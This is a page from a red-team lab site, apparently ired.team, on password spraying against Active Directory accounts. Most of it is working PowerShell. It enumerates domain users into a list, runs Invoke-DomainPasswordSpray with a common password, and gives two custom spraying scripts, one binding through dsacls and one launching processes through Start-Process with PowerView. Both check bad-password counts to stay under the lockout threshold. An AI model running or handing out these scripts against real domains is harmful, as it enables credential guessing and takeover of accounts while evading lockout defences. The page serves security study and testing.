Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
From Domain Admin to Enterprise Admin
Kerberoasting
Kerberos: Golden Tickets
Kerberos: Silver Tickets
AS-REP Roasting
Kerberoasting: Requesting RC4 Encrypted TGS when AES is Enabled
Kerberos Unconstrained Delegation
Kerberos Constrained Delegation
Kerberos Resource-based Constrained Delegation: Computer Object Takeover
Domain Compromise via DC Print Server and Kerberos Delegation
DCShadow - Becoming a Rogue Domain Controller
DCSync: Dump Password Hashes from Domain Controller
PowerView: Active Directory Enumeration
Abusing Active Directory ACLs/ACEs
Privileged Accounts and Token Privileges
From DnsAdmins to SYSTEM to Domain Compromise
Pass the Hash with Machine$ Accounts
BloodHound with Kali Linux: 101
Backdooring AdminSDHolder for Persistence
Active Directory Enumeration with AD Module without RSAT or Admin Privileges
Enumerating AD Object Permissions with dsacls
Active Directory Password Spraying
Active Directory Lab with Hyper-V and PowerShell
ADCS + PetitPotam NTLM Relay: Obtaining krbtgt Hash with Domain Controller Machine Certificate
From Misconfigured Certificate Template to Domain Admin
Shadow Credentials
Abusing Trust Account$: Accessing Resources on a Trusted Domain from a Trusting Domain
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Active Directory Password Spraying
This lab explores ways of password spraying against Active Directory accounts.

Invoke-DomainSpray

[email protected]
Get-ADUser -Properties name -Filter * | Select-Object -ExpandProperty name | Out-File users.txt
type users.txt
[email protected]
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

Spraying using dsacls

While I was poking around with dsacls for enumerating AD object permissions
I noticed that one could attempt to bind to LDAP using specific AD credentials, so a dirty AD password spraying POC came about:
[email protected]
$domain = ((cmd /c set u)[-3] -split "=")[-1]
$pdc = ((nltest.exe /dcname:$domain) -split "\\\\")[1]
$lockoutBadPwdCount = ((net accounts /domain)[7] -split ":" -replace " ","")[1]
$password = "123456"
​
# (Get-Content users.txt)
"krbtgt","spotless" | % {
$badPwdCount = Get-ADObject -SearchBase "cn=$_,cn=users,dc=$domain,dc=local" -Filter * -Properties badpwdcount -Server $pdc | Select-Object -ExpandProperty badpwdcount
if ($badPwdCount -lt $lockoutBadPwdCount - 3) {
$isInvalid = dsacls.exe "cn=domain admins,cn=users,dc=offense,dc=local" /user:[email protected].local /passwd:$password | select-string -pattern "Invalid Credentials"
if ($isInvalid -match "Invalid") {
Write-Host "[-] Invalid Credentials for $_ : $password" -foreground red
} else {
Write-Host "[+] Working Credentials for $_ : $password" -foreground green
}
}
}

Spraying with Start-Process

Similarly to dsacls, it's possible to spray passwords with Start-Process cmdlet and the help of PowerView's cmdlets:
spray-ldap.ps1
# will spray only users that currently have 0 bad password attempts
# dependency - powerview
​
function Get-BadPasswordCount {
param(
$username = "username",
$domain = "offense.local"
)
$pdc = (get-netdomain -domain $domain).PdcRoleOwner
$badPwdCount = (Get-NetUser $username -Domain $domain -DomainController $pdc.name).badpwdcount
return $badPwdCount
}
​
$users = Get-netuser -properties samaccountname | Select-Object -ExpandProperty samaccountname
$domain = "offense.local"
$password = "123456"
​
Write-Host $users.Count users supplied; $users | % {
$badPasswordCount = Get-BadPasswordCount -username $_ -Domain $domain
if ($badPasswordCount -lt 0) {
Write-Host Spraying : -NoNewline; Write-host -ForegroundColor Green " $_"
$credentials = New-Object System.Management.Automation.PSCredential -ArgumentList @("$domain\$_",(ConvertTo-SecureString -String $password -AsPlainText -Force))
Start-Process cmd -Credential ($credentials)
} else {
Write-Host "Ignoring $_ with $badPasswordCount badPwdCount" -ForegroundColor Red
}
}
Enjoy the shells:

References

DomainPasswordSpray/DomainPasswordSpray.ps1 at master · dafthack/DomainPasswordSpray
GitHub
PowerSploit/Recon at master · PowerShellMafia/PowerSploit
GitHub
​
​
Previous
Enumerating AD Object Permissions with dsacls
Next
Active Directory Lab with Hyper-V and PowerShell
Last modified 3yr ago
Copy link
Outline
Invoke-DomainSpray
Spraying using dsacls
Spraying with Start-Process
References